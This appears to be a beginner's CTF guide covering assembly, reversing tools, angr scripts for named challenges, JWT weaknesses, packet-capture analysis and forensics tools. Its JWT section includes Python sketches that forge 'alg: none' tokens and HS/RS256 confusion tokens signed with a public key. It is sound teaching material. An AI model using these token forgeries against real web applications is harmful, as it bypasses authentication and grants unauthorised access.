Assembly code:

So, now that we've got that out the way, let's take a look at some actual code for assembly. All of this will be explained in more detail here, but just as a general overview, here are the most important commands needed for CTFs (I'm going to use Intel syntax for easier reading):

mov <destination>, <source> - moves data from the source to the destination
cmp <register>, <register/value> - compares the register to the register / value; a jump instruction normally follows to take a different path depending on the outcome
jmp <label> - loads the address of the label (a function or memory address) into the rip register, so the program continues executing from there
call <label> - jumps to the function or memory address after saving a return address - basically calls a subroutine
push <register/value> - pushes the register or value onto the stack to preserve it
pop <register> - pops the top value off of the stack and stores it in the register
pop [register] - (the square brackets are necessary) - pops the value off of the stack, saving it into a position in memory, such as ebp-0x8
test <register>, <value> - performs a bitwise AND operation on the register and the value
<math operation> <register>, <register/value> - as it says on the tin - applies a math operation (add, subtract, etc.) to the register using the register/value

So there you have some actual assembly code under your belt! Welcome to the reversing world!

CTF Tips And Tricks

There are some things that I always do before actually running the binary. This is called static analysis: analysing the binary (or whatever is in question) while it's not running, so that it stays the same, or static.

The very first thing that I like to do is see what "low hanging fruit" we have available, or what information we have available without much effort.

Strings:

I like to first check what strings are in the binary. To do that, we run

Just because we love radare2 and its family, we might as well get used to some of its family members and their syntax. In the strings, we might find a flag, some usernames or passwords, or anything else that may help us investigate the binary further.

File type:

Next, we want to check what file type we're dealing with. We have two main file types that we find in CTFs:

We can find out what type of executable it is by running:

rabin2 will return a lot more information about the binary than just its file type (whether it's little or big endian, has a canary, full or partial PIC, etc.). It's mainly used when doing pwn because of the amount of information that we get from it, but it's still a nice tool to have.

Trace program execution:

Here, we're seeing what is happening with the program - we're now moving to dynamic analysis, as we're executing the binary and seeing what steps it's taking. To see a trace of the program, we can use either:

The difference between these two tools is that strace intercepts the system calls that the program (through glibc and other libraries) makes directly into the kernel, while ltrace intercepts the library calls made by the application to C libraries such as glibc, and can show system calls too. They do display similar outputs, but it's good to know what each tool does before diving straight into it.

If we don't get anything from these, then we start to play around with the binary. We execute it, and see what prompt it asks us for. We can input any of these to see what output we get:

Characters: "A"
Strings: "Hello World"
Integers: 1
Floating point numbers: 1.5
Negative numbers: -1
Boolean: True or False
Format strings: %x
Buffer overflow: (Provide more characters than the buffer can accept)
Hex: 0xdeadc0de
And some more may come to me later :)

If none of those work, then I think that it's time to start using our tools.

Tools

going brrrrrr

So, one of the first things that we need when dealing with reverse engineering is tools. Can't do much without them!

Some of the tools that I like to use are:

Kali Linux (Yes, I'm counting it as a tool as much as an Operating System. Live with it :) )
Radare2 and its family
Ghidra

Those are my main tools for reversing a binary. So, let's get them installed onto our machine. -> I've covered how to install these tools here

Other tools that I haven't used, but that you may be familiar with, are:

IDA (Pro)
Hopper
dnSpy
Ollydbg
Binary Ninja

And many more that I haven't heard of!

Once we've got everything set up, we're good to go!

Angr

Bruteforce but smart

Angr is a powerful binary analysis framework which has come in handy several times in CTFs. It does a huge amount of stuff, so I'm only going to cover the few things I've used it for.

Symbolic Execution

Angr can analyse binaries by inputting 'symbols' rather than literal text. What happens to these symbols (comparisons, transformations) is then recorded, allowing us to get a picture of what a binary is doing. The main usage I've gotten out of this is flag-checker challenges, where we are expected to enter a flag, our input goes through a series of transformations, and is compared against a constant to check if the entered value is correct. Here's a script I used to solve Beginner from Google CTF 2020.

import angr, claripy
target = angr.Project('a.out', auto_load_libs=False)
input_len = 15 # Discovered with manual analysis at a glance
inp = [claripy.BVS('flag_%d' %i, 8) for i in range(input_len)]
# Define an array of 8-bit vectors, one for each char of the flag
flag = claripy.Concat(*inp + [claripy.BVV(b'\n')])

st = target.factory.full_init_state(args=["./a.out"], stdin=flag)
# Create a simulation with our flag symbols as stdin
for k in inp:
    st.solver.add(k < 0x7f)
    st.solver.add(k > 0x20)
# Add constraints that the characters should be printable

sm = target.factory.simulation_manager(st)
sm.run()
y = []
for x in sm.deadended:
    # Out of the simulations that exit, record
    # any that output SUCCESS
    if b"SUCCESS" in x.posix.dumps(1):
        y.append(x)

# Grab the stdin that produced the first successful output
valid = y[0].posix.dumps(0)
print(valid)

This particular example isn't great: I was just getting to learn angr, and it is basically a brute force, since it runs every path to completion and only then filters the results. However, it shows how easy angr makes challenges that only need light brute forcing.

Here's a better example: Beginner Rev from Fword CTF

import angr
import claripy #the solver engine

proj = angr.Project("./welcome", auto_load_libs=False)
sym_arg_size = 0x10 #Length in Bytes because we will multiply with 8 later
inp = [claripy.BVS('flag_%d' % i, 8 ) for i in range(sym_arg_size)]
flag = claripy.Concat(*inp + [claripy.BVV(b'\n')])
state = proj.factory.full_init_state(args=["./welcome"], stdin=flag)
for byte in inp:
    state.solver.add(byte >= ord('0'))
    state.solver.add(byte <= ord('9'))
# Input is specified to be a number
simgr = proj.factory.simulation_manager(state)
good = 0x400000 + 0x12b2
# Address of flag file being opened
bad = [0x400000 + 0x1669, 0x400000 + 0x167b]
# Addresses of failure messages being printed
simgr.use_technique(angr.exploration_techniques.DFS())
simgr.explore(find=good, avoid=bad)
# Explore input that will end at the good while avoiding the bad
found = simgr.found[0]
print(found.solver.eval(flag, cast_to=bytes))
# Cast our found input to bytes and print

This is a much more intelligent way of exploring the binary, and printed 1755121917194838 after only 20 seconds.

Tools Setup

Radare 2

Kali comes pre-installed with radare2. You can check by doing:

$ radare2 -v

If it's not installed, then we can either install it with apt:

$ sudo apt-get install radare2

Or you can install it from GitHub:

$ git clone https://github.com/radare/radare2.git
$ cd radare2
$ sys/install.sh

(Or without root permissions)

$ sys/user.sh

And then to run it:

$ r2

Ghidra:

Ghidra is a reverse engineering tool that the NSA released as open source back in April 2019, and it's an amazing tool.

Official download link: https://www.ghidra-sre.org/
Github page: https://github.com/NationalSecurityAgency/ghidra
Full installation guide found here: https://ghidra-sre.org/InstallationGuide.html

The software needed to install ghidra is as follows (taken exactly from the installation guide):

Java 11 64-bit Runtime and Development Kit (JDK)
Free long term support (LTS) versions of JDK 11 are provided here:
- AdoptOpenJDK
- Amazon Corretto

If, for whatever reason, your installation doesn't go as expected, here is ghidra's troubleshooting page: https://ghidra-sre.org/InstallationGuide.html#Troubleshooting

Linux:

Once you've downloaded ghidra as a zip file, you need to unzip it and make sure a JDK is installed:

$ unzip ghidra_*_PUBLIC_*.zip
$ sudo apt-get install default-jdk

Change directories into the ghidra folder, and then run using

$ ./ghidraRun

Windows:

Extract the zip file to any location that you would like (I'm going to be using the desktop)

Right click on zip -> extract all / extract (here)

Open the Environment Variables window:

Right click on windows start button -> Click on "System"
Click "Advanced System Settings" on the left (Administrative privileges needed)
Click "Environment Variables" at the bottom

Add the JDK bin directory to the PATH variable

Under "System Variables", click "Path" -> edit -> new
Type the path of where you extracted the JDK to + "\bin"
Click "ok" -> "ok" -> "ok"

To run:

Navigate to the path where you extracted the ghidra zip
Run ghidraRun.bat

Web

JWT

JSON Web Tokens - A method of storing data on the client side so that it is readable, but not modifiable, by the end user. The format is 3 base64url-encoded segments, joined by a ".". The first is a header (a JSON object containing metadata about the token, such as the signing algorithm). The next segment is the payload, a JSON object which contains the actual data held. The final portion is the signature, which is produced by passing the encoded header and payload through a cryptographic function keyed with a secret. The idea is that users cannot generate a valid signature without knowing the server's secret.
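
To make the three-part layout concrete, here is a minimal sketch that builds and checks an HS256 token using only the Python standard library. The helper names (b64url, sign_hs256, verify_hs256) are made up for this example; a real application would normally use a maintained JWT library instead.

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    """Decode base64url, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(payload: dict, secret: bytes) -> str:
    """Return header.payload.signature for the given payload."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def verify_hs256(token: str, secret: bytes) -> dict:
    """Recompute the signature; return the payload only if it matches."""
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(signing_input.split(".")[1]))
```

Anyone can decode the first two segments and read them, but changing either one invalidates the signature unless the secret is known.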

None Algorithm

In some implementations of JWT, it is possible to set the algorithm in the header to 'none'. The server then skips signature verification, so maliciously crafted data with an empty signature will pass the check.
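
A minimal sketch of what such a token looks like, assuming the target accepts the lowercase value "none" (some implementations only fall for other capitalisations). forge_none_token is a made-up helper name, and the payload is purely illustrative.

```python
import base64
import json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(payload: dict) -> str:
    """Build an unsigned token: the header says alg=none and the
    signature segment after the final dot is left empty."""
    header = {"alg": "none", "typ": "JWT"}
    parts = [
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    ]
    return ".".join(parts) + "."

token = forge_none_token({"user": "admin"})
print(token)
```

Note the trailing dot: the token still has three segments, the last one is just empty.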

HS/RS256 confusion

If a webapp uses RS256, the data is signed using an RSA private key, then verified using the corresponding public key. The HS256 algorithm uses a single shared secret to both sign and verify. If a webapp does not enforce RS256, the header can be switched to HS256. This will result in the server using the public key as the HMAC 'secret'. If the public key can be obtained, an attacker can use it to sign a token, which will then pass the checks on the server.
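
The confusion can be sketched as follows. PUBLIC_KEY_PEM is a placeholder rather than a real key, and naive_verify is a toy stand-in for a vulnerable server, not any particular library's behaviour. In practice the key bytes must match exactly what the server loads, including newlines.

```python
import base64
import hashlib
import hmac
import json

# Placeholder only: in a real attack this would be the server's actual
# RSA public key, byte-for-byte as the server loads it.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----\n"

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256(payload: dict, public_key_pem: bytes) -> str:
    """Sign a token with HMAC-SHA256, using the public key bytes as the secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(public_key_pem, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"

def naive_verify(token: str, key: bytes) -> bool:
    """Toy vulnerable check: trusts the header's alg and feeds the same
    key to whichever algorithm the token asks for."""
    head, body, sig = token.split(".")
    alg = json.loads(base64.urlsafe_b64decode(head + "=" * (-len(head) % 4)))["alg"]
    if alg != "HS256":
        raise NotImplementedError("only the HS256 branch is sketched here")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), sig)

token = forge_hs256({"user": "admin"}, PUBLIC_KEY_PEM)
print(naive_verify(token, PUBLIC_KEY_PEM))  # True
```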

Forensics

Analysing Network Packet Captures

the best category :)

Part 1: What is a Network Packet Capture?

A network packet capture (or pcap for short) is a recording of the packets sent over a network. In a "Capture The Flag" competition, this is usually approached from a blue team perspective, analysing the capture to find a flag. However, in a penetration test, a pen tester may capture packets to grab important pieces of information, such as passwords.

Part 2: What software can be used to analyse Packet Captures?

When searching for software to analyse packet captures, you may be overwhelmed with the choice. The software that we'll be using in this explanation is Wireshark. Wireshark is free and open source, which is why it's my software of choice. A simple search for your system will give you a guide on installation.

Part 3: Analysing The Packet Capture

When analysing a packet capture, the first thing I recommend doing is organising the packets by protocol.

Out of all these packets, the 3 GET requests in the HTTP protocol section look the most interesting. I will highlight them to help them stand out.

However, there is no text data here, as seen by the 304 (Not Modified) responses, which carry no body. Let's try again.

Now, let's give these a read.

Double clicking on the packet brings you to this:

This gives us some really useful info:

ssssh! they arent supposed to see this, keep quiet and read the next file. xoxo - [redacted]

This tells us to read 2.txt.

This file states:

ok, this should be really hard for the defenders to see. I'm gonna encode the important data with a secure method that the attackers wont get :)

66 6f 72 65 6e 73 69 63 73 20 69 73 20 6d 79 20 70 61 73 73 69 6f 6e 20 3a 29

enjoy! :)

If you aren't in the know, maybe we should read the last highlighted packet, 3.txt.

This file states:

Did you really forget the encoding method? oh my, i guess i'll have to tell you: base16

now i really hope the defenders dont see this

Bingo! We now have the encoded text and the encoding method.

Now, we can decode this from base16 (hex), and we get the message: forensics is my passion :)
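
If you don't have a decoder to hand, the same step can be done in a couple of lines of Python. This is just one way to do it; bytes.fromhex skips the spaces between the byte pairs.

```python
# The base16 text from 2.txt, exactly as captured
encoded = "66 6f 72 65 6e 73 69 63 73 20 69 73 20 6d 79 20 70 61 73 73 69 6f 6e 20 3a 29"

# Turn each pair of hex digits back into a byte, then read it as ASCII
decoded = bytes.fromhex(encoded).decode("ascii")
print(decoded)  # forensics is my passion :)
```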

I hope you enjoyed this, and took something away from it :)

Disk Images

Downloads, downloads, downloads... Some help for the (unfortunately rather uncommon) disk image challenges you might come across!

Tools for Analysing Disk Images:

Autopsy (my personal recommendation)
FTK Imager

Autopsy

A wonderful and powerful tool for the analysis of disk images. When provided with a disk image, it will by default run ingest modules such as Exif Parser and Extension Mismatch Detector, among many others. However, these can take a little while to run if you leave them all on, especially with larger images. Modules such as Hash Lookup can safely be left disabled for CTFs, as this is usually only used in actual forensic investigations: it compares a list of hashes of "known bad" files against the files in the disk image. Usually, the disk image will contain files that you will also have to analyse and mess with to get flags. A good example of this is RACTF2020's "Disk Forensics Fun", where an Alpine Linux image that contains files is given. I would recommend trying this challenge out for practice, as well as the other forensics challenges from RACTF2020.
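
To show what a hash lookup amounts to, here is a minimal sketch of the idea in Python. It is not how Autopsy implements its module. It assumes the image's files have already been extracted or mounted to a directory, and find_known_files and sha256_of are made-up helper names.

```python
import hashlib
from pathlib import Path

def sha256_of(path, chunk_size=65536):
    """Hash a file in chunks so large files don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def find_known_files(root, known_hashes):
    """Return every file under root whose SHA-256 is in known_hashes."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and sha256_of(path) in known_hashes:
            hits.append(path)
    return hits
```

Here known_hashes would be a set of lowercase hex digests taken from whatever "known bad" list you are working with.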

Steganography

As a category, forensics has almost become infamous for this type of challenge: the, frankly, uninspired kind.

Common Tools:

Images:

Steghide
Zsteg
Digital Invisible Ink Toolkit (diit)
Stegsolve
Exiftool

Text:

Stegsnow

Audio:

Deepsound
WavSteg

Other:

Binwalk
Foremost